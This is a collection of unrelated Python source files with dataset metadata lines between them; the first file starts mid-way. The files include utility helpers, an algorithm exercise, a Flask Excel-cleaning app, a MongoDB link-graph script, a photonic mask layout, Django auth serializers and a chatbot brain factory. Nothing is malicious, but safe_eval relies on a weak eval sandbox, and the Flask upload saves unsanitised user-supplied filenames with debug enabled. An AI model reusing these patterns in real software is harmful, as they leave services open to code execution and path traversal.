""" return isinstance(value, (float, int, np.integer, np.floating)) def leaves(obj: Map) -> t.Generator: """Get leaves of a mapping Args: obj (Map): The dict-like object Returns: t.Generator: A generator that yields the leaf elements of the mapping. """ paths = get_valid_access_paths(obj, _leaf_only=True, _use_lists=False) return (getitem(obj, path) for path in paths) def list2cmdline(seq: t.Iterable) -> str: """Translates a sequence of arguments into a command line string with "None" removal Args: seq (t.Iterable): The sequence of arguments Returns: str: The command-line string """ seq = [_ for _ in seq if _ is not None] return _list2cmdline(seq) def map_to_leaves(function: t.Callable[[t.Any], t.Any], obj: t.T, _seq: bool = True) -> t.Any: """Map a function to leaves of an object A leaf is considered to be an object that is not a Mapping (or, when _seq is set, also not a Sequence except a string, which is also a Sequence). Args: function (t.Callable[[t.Any], t.Any]): a function or signatude "a -> a" obj (t.T): a dict-like, list-like, or plain object _seq (bool, optional): map on elements of lists? Returns: t.T: the obj with transformed elements """ def inner(obj: t.T) -> t.Any: if isinstance(obj, Map): return type(obj)({k: inner(v) for k, v in obj.items()}) elif _seq and isinstance(obj, (t.List, t.Set)): return type(obj)(inner(v) for v in obj) else: return function(obj) return inner(obj) def mro_getattr(cls: type, attr: str, *args: t.Any) -> t.Any: """Get an attribute from a type's class hierarchy Args: cls (type): The type attr (str): The attribute *args (t.Any): The default value (like in Python's default getattr) Returns: t.Any: The attribute, or when not found the default value (if provided) Raises: TypeError: Not called on a type TypeError: Wrong number of arguments AttributeError: Attribute not found and no default value provided """ if not isinstance(cls, type): raise TypeError(f"mro_getattr can only be used on types, got {type(cls)}") if len(args) > 1: raise TypeError(f"mro_getattr expected at most 3 arguments, got {2 + len(args)}") for klass in cls.mro()[1:]: if hasattr(klass, attr): # return first matching attribute return getattr(klass, attr) if args: # if provided, return args[0], i.e. the a default value return args[0] else: raise AttributeError(f"type object {cls.__name__!r} has not attribute {attr!r}") def mro_hasattr(cls: type, attr: str) -> bool: """Check if an attribute exists in a type's class hierarchy Args: cls (type): The type attr (str): The attribute Returns: bool: True if has the attribute. 
Raises: TypeError: Not called on a type """ if not isinstance(cls, type): raise TypeError(f"mro_getattr can only be used on types, got {type(cls)}") for klass in cls.mro()[1:]: if hasattr(klass, attr): return True return False def random_string(length: int) -> str: """Make a random string of specified length Args: length (int): The desired random string length Returns: str: The random string """ assert isinstance(length, int), f"'length' must be an int, got: {type(length)}" return "".join(random.choices(ascii_letters, k=length)) def timestamp() -> str: """Make a timestamp with current time Returns: str: The timestamp in ISO format """ return datetime.now().isoformat("_", timespec="seconds").replace(":", "-") def safe_eval( to_eval: str, *, expect: t.Tuple[type] = (list, np.ndarray), timeout: int = 10 ) -> object: """Evaluate a restricted subset of Python (and numpy) from a string Args: to_eval (str): The string to evaluate expect (t.Tuple[type]): The list of expected resulting types. Defaults to list, ndarray. timeout (int): The timeout after which the call fails in seconds. Defaults to 10. The `safe_eval` function allows using a subset of commands, listed in `_globals` and `_locals`, which includes a few numpy functions: linspace, arange, array, rand, and randint. Examples: >>> safe_eval("linspace(1, 10, 10, dtype=int).tolist()") [1, 2, 3, 4, 5, 6, 7, 8, 9, 10] >>> safe_eval("__import__('os').getcwd()") NameError Traceback (most recent call last) ... NameError: name '__import__' is not defined >>> safe_eval("range(5)") TypeError Traceback (most recent call last) ... TypeError: eval produced a <class 'range'>, expected: (<class 'list'>, <class 'numpy.ndarray'>) >>> safe_eval("list(round(rand(), 2) for _ in range(5))") [0.96, 0.41, 0.9, 0.98, 0.02] """ assert isinstance(to_eval, str), "'to_eval' must be a str" assert isinstance(expect, tuple), "'expect' must be a tuple" assert all(isinstance(_, type) for _ in expect), "'expect' must contain only types" _locals = {} _globals = { "__builtins__": {}, "list": list, "range": range, "len": len, "int": int, "float": float, "min": min, "max": max, "round": round, "linspace": np.linspace, "geomspace": np.geomspace, "logspace": np.logspace, "hstack": np.hstack, "vstack": np.vstack, "split": np.split, "arange": np.arange, "array": np.array, "rand": np.random.rand, "randint": np.random.randint, } class AlarmException(Exception): pass def signal_handler(number: int, frame): assert number == signal.SIGALRM.value raise AlarmException() signal.signal(signal.SIGALRM, signal_handler) signal.alarm(timeout) try: _ = eval(to_eval, _globals, _locals) except AlarmException: raise TimeoutError(f"safe_eval took longer than {timeout} seconds") else: signal.signal(signal.SIGALRM, signal.SIG_IGN) signal.alarm(0) if not isinstance(_, expect): raise EvalTypeError(f"eval produced a {type(_)}, expected: {expect}") return _ def sanitise_ansi(value: t.Union[t.List[str], str]) -> t.Union[t.List[str], str]: """Remove all ANSI escape characters from a str or a list of str Args: value (t.Union[t.List[str], str]): The string or list of strings Returns: t.Union[t.List[str], str]: The sanitised string or a list of sanitised strings """ _ansi_escape = re.compile(r"(\x9B|\x1B\[)[0-?]*[ -\/]*[@-~]") if isinstance(value, str): return _ansi_escape.sub("", value) elif isinstance(value, t.List): return list(map(lambda x: _ansi_escape.sub("", x).strip(), value)) else: raise TypeError("sanitise_ansi accepts only str or lists of str") def setgetattr(klass: t.Union[type, object], attr: str, 
default: t.Any) -> None: """Combines `setattr` and `getattr` to set attributes Args: klass (t.Union[type, object]): The type or object attr (str): The attribute default (t.Any): The default value """ if not any([isinstance(klass, type), isinstance(klass, object)]): raise TypeError("'klass' should be a type or an object", klass) if not isinstance(attr, str): raise TypeError("'attr' should be a str") if not attr: raise ValueError("'attr' should not be empty") setattr(klass, attr, getattr(klass, attr, default)) def setitem(obj: t.MutableMapping, query: t.Tuple, value: t.Any, force: bool = False) -> None: """Set a value in a dict-like object using a tuple-path query Args: obj (t.MutableMapping): a mutable mapping query (t.Tuple): a query path as a tuple value (t.Any): value to set Raises: TypeError: if obj is not a mutable mapping """ if not isinstance(obj, t.MutableMapping): raise TypeError("'obj' needs to be a mutable mapping", type(obj)) _obj = obj _valid = get_valid_access_paths(obj) if query not in _valid: if not force: raise KeyError(f"query-path {query!r} not found") else: for node in query[:-1]: if node not in _obj: _obj = dict() _obj = _obj[node] else: for node in query[:-1]: _obj = _obj[node] _obj[query[-1]] = value def stub_recursively( obj: t.T, stub: t.Any = None, _stub_list_elements: bool = True ) -> t.Optional[t.T]: """Produce a copy with all leaf values recursively set to a 'stub' value Args: obj (t.T): the object to stub stub (t.Any, optional): the value to set the leaf elements to _stub_list_elements (bool, optional): stub individual elements in collections? Returns: (t.T, optional): the stubbed object """ def inner(obj): if isinstance(obj, Map): return type(obj)((k, inner(v)) for k, v in obj.items()) elif _stub_list_elements and isinstance(obj, (t.List, t.Set)): return type(obj)(inner(v) for v in obj) else: return stub return inner(obj) def unpack__all__(*imports: t.Collection[str]) -> t.Tuple[str]: """Upacks a list of lists/tuples into a 1-dimensional list Args: *imports (t.Collection[str]): The collections of strings in "__all__" Returns: t.Tuple[str]: The flattened imports as a tuple of strings. """ from itertools import chain _name = f"{__name__}.unpack__all__" if not all(isinstance(e, (t.List, t.Tuple)) for e in imports): raise TypeError(f"{_name}: arguments should be lists or tuples") _ = chain(*imports) assert all( issubclass(type(e), str) for e in _ ), f"{_name}: values in unpacked containers were not scalar or 'str'" return tuple(_) def validate_helper(what: t.Mapping, key: t.Any, *types: type, msg: str = "") -> t.NoReturn: """Validate types of key in a mapping using key-paths Args: what (t.Mapping): The mapping key (t.Any): The key *types (type): The valid types msg (str): An additional error message. Defaults to "". """ if not isinstance(what, t.Mapping): raise TypeError(f"validate_helper works only on mappings, got {type(what)}") if not types: raise TypeError(f"validate helper expects at least 1 'types' argument") if isinstance(key, str) or not isinstance(key, t.Iterable): key = tuple([key]) elif not isinstance(key, tuple): key = tuple(key) # The `config` property setter guarantees that `config` is a fully # mutated AttributeDict, therefore :meth:`getattr` can be used. 
if not isinstance(getitem(what, key, None), types): raise MisconfiguredError( "{0}config key: '{1!s}' should be of type {2!r}, got {3!s}".format( f"{msg} " if msg else "", key, types, type(getitem(what, key, None)) ) ) def get_cores_and_schedules(environments_apps_zones: t.Mapping) -> set: e_a_z = environments_apps_zones _cores_and_schedules = set() for env in e_a_z: for app in e_a_z[env]: if app != "src": continue _path_to_cores = ("app_config", "generator", "cores") _path_to_schedule_tag = ("zone_config", "schedule_tag") access_paths = list(get_valid_access_paths(e_a_z[env][app])) if _path_to_cores not in access_paths: raise LayerMisconfigured( f"{env!r}->{app!r} must have a 'generator.cores' config key" ) if _path_to_schedule_tag not in access_paths: _ = e_a_z[env][app]["zone"] raise LayerMisconfigured( f"{env!r}.{_!r} of app {app!r} must have a schedule_tag" ) _cores_and_schedules.add( ( len(getitem(e_a_z[env][app], _path_to_cores)), getitem(e_a_z[env][app], _path_to_schedule_tag), ) ) return _cores_and_schedules
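
# --- Added usage note (illustrative, based on the implementations above) ---
# The query-path helpers accept either separator-delimited strings or tuple paths, e.g.:
#
#     d = {"a": {"b": 1}}
#     getitem(d, "a/b")              # -> 1
#     getitem(d, ("a", "b"))         # -> 1
#     getitem(d, "a/c", "default")   # -> "default" (missing path, default returned)
#     setitem(d, ("a", "b"), 2)      # d becomes {"a": {"b": 2}}
#     flatten_dict(d)                # -> {"a.b": 2}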
1.257813
1
70_question/dynamic_programming/max_profit_with_k_transactions.py
alvinctk/google-tech-dev-guide
26
11831
<reponame>alvinctk/google-tech-dev-guide
def maxProfitWithKTransactions(prices, k):
    n = len(prices)
    profit = [[0]*n for _ in range(k+1)]

    """
    t := number of transactions
    d := day at which either buy/sell stock

    profit[t][d] = max ( previous day profit = profit[t][d-1],
                         profit sold at this day + max(buy for this transaction + profit at last transaction)
                           = prices[d] + max(-prices[x] + profit[t-1][x], where 0 <= x < d) )
    """
    if not prices:
        return 0

    for t in range(1, k+1):
        for d in range(1, n):
            previous_day_profit = profit[t][d-1]

            max_profit_buy_on_t = float("-inf")
            for x in range(0, d):
                max_profit_buy_on_t = max(max_profit_buy_on_t, -prices[x] + profit[t-1][x])

            profit[t][d] = max(previous_day_profit, prices[d] + max_profit_buy_on_t)

    debug = False
    if debug:
        print(prices)
        for row in profit:
            print(row)

    print("Maximum profit for k={} transaction for {} stock prices at each day = {}".format(
        k, prices, profit[-1][-1] if profit else 0))
    return profit[-1][-1]


if __name__ == "__main__":
    maxProfitWithKTransactions([5, 11, 3, 50, 60, 90], 2)
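
# --- Added illustration (not part of the original solution) ---
# The inner loop over x in the recurrence above can be replaced by a running
# maximum of (-prices[x] + profit[t-1][x]), which drops the complexity from
# O(k * n^2) to O(k * n). Sketch for comparison; it gives the same result as
# the function above.
def max_profit_k_transactions_fast(prices, k):
    if not prices or k == 0:
        return 0
    n = len(prices)
    profit = [[0] * n for _ in range(k + 1)]
    for t in range(1, k + 1):
        # best value of "buy at day x, carrying the profit of t-1 transactions up to x"
        best_buy = -prices[0] + profit[t - 1][0]
        for d in range(1, n):
            profit[t][d] = max(profit[t][d - 1], prices[d] + best_buy)
            best_buy = max(best_buy, -prices[d] + profit[t - 1][d])
    return profit[k][n - 1]

# e.g. max_profit_k_transactions_fast([5, 11, 3, 50, 60, 90], 2) == 93,
# matching maxProfitWithKTransactions above.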
3.625
4
main.py
rdmaulana/flask-smart-xls-clean
0
11832
<filename>main.py import pandas as pd import numpy as np import io import time import uuid from flask import Flask, render_template, request, redirect, url_for, Response, session, send_file, make_response, send_from_directory from os.path import join, dirname, realpath from werkzeug.wsgi import FileWrapper app = Flask(__name__) app.config["DEBUG"] = True app.config["UPLOAD_FOLDER"] = 'media/dataset' app.config["EXPORT_FOLDER_CSV"] = 'media/result' app.config["SECRET_KEY"] = '<KEY>' app.config['SESSION_TYPE'] = 'filesystem' @app.route('/') def index(): return render_template('index.html') @app.route("/", methods=['POST']) def uploadExcel(): start_id = request.form['id'] uploaded_file = request.files['file'] if uploaded_file.filename != '': file_path = join(app.config['UPLOAD_FOLDER'], uploaded_file.filename) uploaded_file.save(file_path) cleanExcel(file_path, start_id) csv_name = session['csv_name'] return redirect(url_for('success', file_id=csv_name)) else: return redirect(url_for('index')) @app.route('/export/<file_id>', methods=['GET','POST']) def success(file_id): filename = session['csv_name'] if "csv_name" in session else "" return render_template('success.html', filename=file_id) @app.route('/downloads/<path:filename>', methods=['GET','POST']) def download(filename): uploads = join(app.root_path, app.config['EXPORT_FOLDER_CSV']) return send_from_directory(directory=uploads, filename=filename) def cleanExcel(file_path, start_id): xls = pd.read_excel(file_path) xls.replace(to_replace=[r"\\t|\\n|\\r", "\t|\n|\r"], value=["",""], regex=True) print("Jumlah awal: {}".format(xls.shape)) xls.rename(columns = { 'NIK':'nik', 'NAMA':'nama', 'JENIS_KELAMIN':'jkel', 'TANGGAL_LAHIR':'tgl_lahir', 'NO_HP':'telp', 'INSTANSI_PEKERJAAN':'instansi', 'ALAMAT KTP': 'alamat', 'ALAMAT_KTP': 'alamat', 'KODE_KAB_KOTA_TEMPAT_KERJA': 'kab_id', 'KODE_KATEGORI': 'kategori' }, inplace = True) xls['nik'] = xls['nik'].astype(str) xls.insert(0, 'id', range(int(start_id), int(start_id) + len(xls))) xls.insert(2, 'nama_ktp', xls['nama']) xls.insert(6, 'status', 0) # del xls['NO'] del xls['UMUR'] del xls['JENIS_PEKERJAAN'] xls.drop(xls[xls['tgl_lahir'].isnull()].index, inplace = True) xls.drop(xls[xls['nik'].isnull()].index, inplace = True) xls.drop(xls[xls['nik'].str.len() > 16].index, inplace = True) xls.drop(xls[xls['nik'].str.len() < 16].index, inplace = True) xls.drop(xls[xls.duplicated(['nik'])].index, inplace = True) if xls['tgl_lahir'].dtypes == 'object': xls['tgl_lahir'] = pd.to_datetime(xls['tgl_lahir']) if xls['telp'].dtypes == 'float64': xls['telp'] = xls['telp'].astype(str) xls['telp'] = xls['telp'].str.split('.').str[0] xls['telp'] = xls['telp'].replace('nan',np.NaN) xls['telp'] = '0' + xls['telp'] if xls['telp'].dtypes == 'object': xls['telp'] = xls['telp'].str.split('/').str[0] xls['telp'] = xls['telp'].str.replace('\+62','0') xls['telp'] = xls['telp'].str.replace(' ','') xls['telp'] = xls['telp'].str.replace('-','') if xls['kab_id'].dtypes == 'float64': xls['kab_id'] = xls['kab_id'].astype(str) xls['kab_id'] = xls['kab_id'].str.split('.').str[0] xls['kab_id'] = xls['kab_id'].replace('nan',np.NaN) if xls['kategori'].dtypes == 'int64': xls['kategori'] = xls['kategori'].astype(str) xls['kategori'] = xls['kategori'].apply(lambda x: '0' + x if len(x) == 1 else x) xls['alamat'] = xls['alamat'].replace(';','') print("Jumlah akhir: {}".format(xls.shape)) uid = str(uuid.uuid4())[:4] path_file = 'media/result/' outfile_name = '{0}{1}'.format(time.strftime("%Y%m%d-%H%M%S-"),uid) session['csv_name'] = 
f'{outfile_name}' xls.to_csv(f'{path_file}{outfile_name}.csv', index=False, header=True, encoding="utf-8") if __name__ == '__main__': app.run(debug=True)
2.46875
2
2_UNIXCommands/Exercise11.py
takeyoshinitta/NLP-100-Exercise
3
11833
# 11. Replace tabs into spaces
# Replace every occurrence of a tab character into a space. Confirm the result by using sed, tr, or expand command.

with open('popular-names.txt') as f:
    for line in f:
        print(line.strip().replace("\t", " "))
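
# --- Added note (not part of the original answer) ---
# Equivalent shell one-liners for confirming the result, as the exercise suggests
# (GNU sed understands \t; on BSD sed a literal tab character may be needed):
#
#     sed 's/\t/ /g' popular-names.txt
#     tr '\t' ' ' < popular-names.txt
#     expand -t 1 popular-names.txt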
3.28125
3
scripts/wapo/wapo_link_graph_from_mongo.py
feup-infolab/army-ant
5
11834
<filename>scripts/wapo/wapo_link_graph_from_mongo.py #!/usr/bin/env python # # wapo_link_graph_from_mongo.py # <NAME> <<EMAIL>> # 2019-02-05 import logging import sys import warnings import networkx as nx from bs4 import BeautifulSoup from pymongo import MongoClient logging.basicConfig( format='%(asctime)s wapo_link_graph_from_mongo: %(levelname)s: %(message)s', datefmt='%Y-%m-%d %H:%M:%S', level=logging.INFO) warnings.filterwarnings("ignore", category=UserWarning, module='bs4') if len(sys.argv) < 3: print("Usage: %s MONGO_DBNAME OUTPUT_GRAPH_PATH" % sys.argv[0]) sys.exit(1) database = sys.argv[1] output_graph_path = sys.argv[2] mongo = MongoClient() db = mongo[database] def document_iterator(): for doc in db.articles.find(): yield doc for doc in db.blog_posts.find(): yield doc logging.info("Extracting anchors from content elements (using article_url as node ID) and building graph") g = nx.DiGraph() doc_count = 0 edge_count = 0 attr_keys = ['id', 'title', 'article_url', 'published_date', 'author', 'type'] for source in document_iterator(): if not 'contents' in source or source.get('contents') is None: continue for par in source['contents']: if par is None: continue html = par.get('content') if html is None: continue html = str(html) soup = BeautifulSoup(html, 'lxml') anchors = soup.find_all('a') for a in anchors: target_url = a.attrs.get('href') if target_url is None: continue query = {'article_url': target_url} attr_selector = { '_id': -1, 'id': 1, 'article_url': 1, 'title': 1, 'published_date': 1, 'author': 1, 'type': 1} target = db.articles.find_one(query, attr_selector) \ or db.blog_posts.find_one(query, attr_selector) if target is None: continue # graph[source_url].add(target_url) g.add_node( source['id'], **{k.replace('_', ''): source[k] for k in attr_keys if not source[k] is None}) g.add_node( target['id'], **{k.replace('_', ''): target[k] for k in attr_keys if not target[k] is None}) g.add_edge(source['id'], target['id']) edge_count += 1 doc_count += 1 if doc_count % 1000 == 0: logging.info("%d documents processed (%d edges created)" % (doc_count, edge_count)) logging.info("%d documents processed (%d edges created)" % (doc_count, edge_count)) logging.info("Saving graph to %s" % output_graph_path) if output_graph_path.endswith('.gml') or output_graph_path.endswith('.gml.gz'): nx.write_gml(g, output_graph_path) else: nx.write_graphml(g, output_graph_path)
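
# --- Added note (not part of the original script) ---
# The saved graph can be loaded back with networkx for later analysis, e.g.:
#
#     g = nx.read_graphml(output_graph_path)   # or nx.read_gml(...) for .gml output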
2.65625
3
designScripts/vernierMask.py
smartalecH/BYUqot
5
11835
<gh_stars>1-10 # ------------------------------------------------------------------ # # vernierMask.py # ------------------------------------------------------------------ # # # A mask design used to align the 3D printer to a silicon photonic chip # # ------------------------------------------------------------------ # # VERSION HISTORY # 10 Apr 2018 - AMH - Initialization # # ------------------------------------------------------------------ # # ------------------------------------------------------------------ # # Import libraries # ------------------------------------------------------------------ # # Get project library path to import library files import sys import os d = os.path.dirname(os.getcwd()) libPath = os.path.abspath(os.path.join(d, 'lib')) sys.path.insert(0, libPath) # Import all other libraries import gdspy import numpy as np import objectLibrary as obLib # ------------------------------------------------------------------ # # Design Constants # ------------------------------------------------------------------ # # Cell parameters layerNumber = 1 # Vernier mask design parameters (all values in microns) numFingers = 10 # Number of fingers to have on top and bottom fingerWidth = 30 # Width of each finger fingerSpacing = 40 # Spacing between fingers longFingerLength = 200; # Length of the long, middle finger shortFingerLength = 150; # Length of the short, outer fingers baseThickness = 76; # Thickness of edge border of design separationDistance = 380 # distance from edge of pattern to origin buffer = 50 # Kerf width of blade innerBoxWidth = 8.78e3 # Actual dimensions of chip outerBoxWidth = innerBoxWidth + buffer # Buffered chip size numCells = 12 # number of repeated cells in each dimension # Now create a series of functions that return a cell. We'll leverage the recursive # nature of GDS files to keep things simple. 
# ------------------------------------------------------------------ # # Create single Vernier pattern # ------------------------------------------------------------------ # def vernier(): # Intialize cell vernierCell = gdspy.Cell('vernier') # Calculate properties vernierWidth = (longFingerLength + baseThickness) vernierHeight = (2*numFingers + 1) * fingerWidth + fingerSpacing * 2 * numFingers xCenter = -(vernierWidth/2 - baseThickness) # First, place the long finger in the middle vernierCell.add(gdspy.Rectangle([xCenter, -fingerWidth/2], [xCenter+longFingerLength, fingerWidth/2],layer=layerNumber)) # Next, iterate through and place the other fingers for k in range(1,numFingers+1): # Add top fingers vernierCell.add(gdspy.Rectangle( [xCenter, fingerWidth/2 + fingerSpacing*k + fingerWidth*(k-1)], [xCenter+shortFingerLength,fingerWidth/2 + fingerSpacing*k +fingerWidth*k], layer=layerNumber)) # Add bottom fingers vernierCell.add(gdspy.Rectangle( [xCenter, -(fingerWidth/2 + fingerSpacing*k + fingerWidth*(k-1))], [xCenter+shortFingerLength,-(fingerWidth/2 + fingerSpacing*k +fingerWidth*k)], layer=layerNumber)) # Finally, add the edge baseHeight = (2*numFingers + 1) * fingerWidth + fingerSpacing * 2 * numFingers vernierCell.add(gdspy.Rectangle([-vernierWidth/2, baseHeight/2], [xCenter, -baseHeight/2],layer=layerNumber)) # Now let's flatten vernierCell.flatten() # Return the cell return vernierCell # ------------------------------------------------------------------ # # Create 2D Vernier pattern from single pattern # ------------------------------------------------------------------ # def vernier2D(): # Intialize 2D cell vernier2DCell = gdspy.Cell('vernier2D') # Initialize 1D cell vernierCell = vernier() # Get vernier dimensions vernierDims = vernierCell.get_bounding_box() vernierWidth = abs(vernierDims[0,0] - vernierDims[1,0]) vernierHeight = abs(vernierDims[0,1] - vernierDims[1,1]) # Place one Vernier pattern in the x direction xCell = gdspy.CellReference(vernierCell,rotation=-90) xCell.translate(-(vernierHeight/2 + separationDistance),-vernierWidth/2) vernier2DCell.add(xCell) # Place another Vernier pattern in the y direction yCell = gdspy.CellReference(vernierCell,rotation=180) yCell.translate(-vernierWidth/2,-(vernierHeight/2 + separationDistance)) vernier2DCell.add(yCell) # Return final cell return vernier2DCell # ------------------------------------------------------------------ # # Create Box outline # ------------------------------------------------------------------ # def boxOutline(): # initialize cell outlineCell = gdspy.Cell('outline') # define an outer box outerBox = gdspy.Rectangle([-outerBoxWidth/2,-outerBoxWidth/2], [outerBoxWidth/2,outerBoxWidth/2],layer=layerNumber) # define an inner box innerBox = gdspy.Rectangle([-innerBoxWidth/2,-innerBoxWidth/2], [innerBoxWidth/2,innerBoxWidth/2],layer=layerNumber) # now subtract the two outline = gdspy.fast_boolean(outerBox,innerBox,'xor',layer=layerNumber) # update the cell outlineCell.add(outline) # return the cell return outlineCell # ------------------------------------------------------------------ # # Create Single Chip # ------------------------------------------------------------------ # def vernierChip(): # Initialize cells vernierChipCell = gdspy.Cell('vernierChip') vernier2DCell = vernier2D() boxOutlineCell = boxOutline() # Add border first vernierChipCell.add(gdspy.CellReference(boxOutlineCell,(0,0))) chipDims = vernierChipCell.get_bounding_box() chipWidth = abs(chipDims[0,0] - chipDims[1,0]) # Now iterate through placing 
corners thetaPos = [45, 135, -135, -45] thetaRot = [0, 90, 180, -90] for k in range(0,4): xPos = np.sign(np.cos(np.deg2rad(thetaPos[k]))) * (chipWidth/2 - buffer/2) yPos = np.sign(np.sin(np.deg2rad(thetaPos[k]))) * (chipWidth/2 - buffer/2) vernierChipCell.add(gdspy.CellReference(vernier2DCell,(xPos,yPos),rotation=thetaRot[k])) # return cell return vernierChipCell # ------------------------------------------------------------------ # # Tapeout entire wafer # ------------------------------------------------------------------ # def vernierMask(): # Initialize cells vernierMaskCell = gdspy.Cell('vernierMask') vernierChipCell = vernierChip() # Get chip dimensions chipDims = vernierChipCell.get_bounding_box() chipWidth = abs(chipDims[0,0] - chipDims[1,0]) # Get mask center center = (numCells * chipWidth) / 2 # Let's make an array vernierMaskCell.add(gdspy.CellArray( vernierChipCell, numCells, numCells, (chipWidth, chipWidth), (-center, -center) )) # return final cell return vernierMaskCell # ------------------------------------------------------------------ # # OUTPUT # ------------------------------------------------------------------ # vernierMask() # Output the layout to a GDSII file (default to all created cells). # Set the units we used to micrometers and the precision to nanometers. filename = 'vernierMask.gds' outPath = os.path.abspath(os.path.join(d, 'GDS/'+filename)) gdspy.write_gds(outPath, unit=1.0e-6, precision=1.0e-9)
1.929688
2
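A minimal usage sketch for the gdspy helpers in the vernierMask.py record above, assuming the script is importable as a module named vernierMask (hypothetical name) and that the same gdspy API used in the file is installed; it renders a single alignment cell rather than the full wafer.

import gdspy
from vernierMask import vernier  # assumed module name for the script above

top = gdspy.Cell('TOP')
# One rotated copy of the Vernier cell, mirroring how vernier2D() places them.
top.add(gdspy.CellReference(vernier(), (0, 0), rotation=-90))
gdspy.write_gds('single_vernier.gds', unit=1.0e-6, precision=1.0e-9)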
src/core/serializers.py
pradipta/back-end
17
11836
from django.contrib.auth import get_user_model from rest_auth.registration.serializers import ( RegisterSerializer as BaseRegisterSerializer, ) from rest_auth.registration.serializers import ( SocialLoginSerializer as BaseSocialLoginSerializer, ) from rest_auth.serializers import LoginSerializer as BaseLoginSerializer from rest_auth.serializers import ( PasswordResetConfirmSerializer as BasePasswordResetConfirmSerializer, ) from rest_auth.serializers import UserDetailsSerializer as BaseUserDetailsSerializer from rest_framework import serializers from rest_framework.exceptions import ValidationError from core.models import Profile # noinspection PyAbstractClass class LoginSerializer(BaseLoginSerializer): """ Extends the default LoginSerializer in order to return custom error messages """ def validate(self, attrs): try: return super().validate(attrs) except serializers.ValidationError as ex: ex.detail = "The email or password you entered is incorrect!" raise ex # noinspection PyAbstractClass class PasswordResetConfirmSerializer(BasePasswordResetConfirmSerializer): """ Extends the default PasswordResetConfirmSerializer in order to return custom error messages """ def validate(self, attrs): try: return super().validate(attrs) except serializers.ValidationError as ex: if "new_password2" in ex.detail: ex.detail = ex.detail["new_password2"][0] else: ex.detail = "Could not reset password. Reset token expired or invalid." raise ex # noinspection PyAbstractClass class CustomSocialLoginSerializer(BaseSocialLoginSerializer): """ Extends default SocialLoginSerializer to add additional details to some failed login attempts """ def validate(self, attrs): try: res = super().validate(attrs) return res except ValidationError as ex: if "User is already registered with this e-mail address." in ex.detail: ex.detail[0] = ( "User is already registered with this e-mail address. " "Please login using the form above." 
) raise ex # noinspection PyAbstractClass class RegisterSerializer(BaseRegisterSerializer): email = serializers.EmailField(required=True) password = serializers.CharField(write_only=True) first_name = serializers.CharField(write_only=True) last_name = serializers.CharField(write_only=True) # legacy compat zip = serializers.CharField(write_only=True, required=False) zipcode = serializers.CharField(write_only=True, required=False) # Overrides the default required password fields password1 = None password2 = None def get_cleaned_data(self): return { "username": self.validated_data.get("email", ""), "email": self.validated_data.get("email", ""), # allauth uses password1 internally for creation "password1": self.validated_data.get("password", ""), "first_name": self.validated_data.get("first_name", ""), "last_name": self.validated_data.get("last_name", ""), "zipcode": self.validated_data.get("zipcode", ""), } def validate(self, data): return data UserModel = get_user_model() class ProfileSerializer(serializers.ModelSerializer): class Meta: model = Profile fields = "__all__" class UserDetailsSerializer(BaseUserDetailsSerializer): profile = ProfileSerializer() class Meta: model = UserModel fields = ("username", "email", "first_name", "last_name", "profile") read_only_fields = ("email",) def to_representation(self, instance: UserModel) -> dict: """Move fields from Profile to user representation.""" representation = super().to_representation(instance) profile = representation.pop("profile") representation["zipcode"] = profile["zipcode"] representation["is_mentor"] = profile["is_mentor"] return representation class UserSerializer(BaseUserDetailsSerializer): profile = ProfileSerializer() class Meta: model = UserModel fields = ("username", "email", "first_name", "last_name", "profile") read_only_fields = ("email",) def to_representation(self, instance: UserModel) -> dict: """Move fields from Profile to user representation.""" representation = super().to_representation(instance) profile = representation.pop("profile") profile.pop("user") for key, val in profile.items(): representation[key] = val return representation
2.15625
2
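A hedged sketch of how the RegisterSerializer in the serializers.py record above remaps a flat signup payload onto the password1 key that django-allauth expects; the payload values are invented, and the snippet presupposes a configured Django project in which core.serializers imports cleanly.

from core.serializers import RegisterSerializer

payload = {
    "email": "jane@example.org",      # invented example data
    "password": "s3cret-pass",
    "first_name": "Jane",
    "last_name": "Doe",
    "zipcode": "12345",
}
serializer = RegisterSerializer(data=payload)
if serializer.is_valid():
    cleaned = serializer.get_cleaned_data()
    # "password" is what clients send; "password1" is what allauth consumes.
    print(cleaned["username"], cleaned["password1"])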
src/programy/brainfactory.py
motazsaad/fit-bot-fb-clt
0
11837
<filename>src/programy/brainfactory.py """ Copyright (c) 2016-2019 <NAME> http://www.keithsterling.com Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ from programy.brain import Brain from programy.utils.classes.loader import ClassLoader from abc import abstractmethod, ABCMeta class BrainSelector(object): __metaclass__ = ABCMeta def __init__(self, configuration): self._configuration = configuration @abstractmethod def select_brain(self, brains): raise NotImplementedError() class DefaultBrainSelector(BrainSelector): def __init__(self, configuration, brains): BrainSelector.__init__(self, configuration) self._brains = brains self._iterator = None self._set_iterator() def _set_iterator(self): if self._brains: self._iterator = iter(self._brains.values()) def select_brain(self): try: if self._iterator: return next(self._iterator) except StopIteration: self._set_iterator() try: if self._iterator: return next(self._iterator) except StopIteration: pass return None class BrainFactory(object): def __init__(self, bot): self._brains = {} self._brain_selector = None self.loads_brains(bot) self.load_brain_selector(bot.configuration) def brainids(self): return self._brains.keys() def brain(self, id): if id in self._brains: return self._brains[id] else: return None def loads_brains(self, bot): for config in bot.configuration.configurations: brain = Brain(bot, config) self._brains[brain.id] = brain def load_brain_selector(self, configuration): if configuration.brain_selector is None: self._brain_selector = DefaultBrainSelector(configuration, self._brains) else: try: self._brain_selector = ClassLoader.instantiate_class(configuration.brain_selector)(configuration, self._brains) except Exception as e: self._brain_selector = DefaultBrainSelector(configuration, self._brains) def select_brain(self): return self._brain_selector.select_brain() def get_question_counts(self): brains = [] for brainid, brain in self._brains.items(): brains.append({"id": brainid, "questions": brain.num_questions}) return brains
2.09375
2
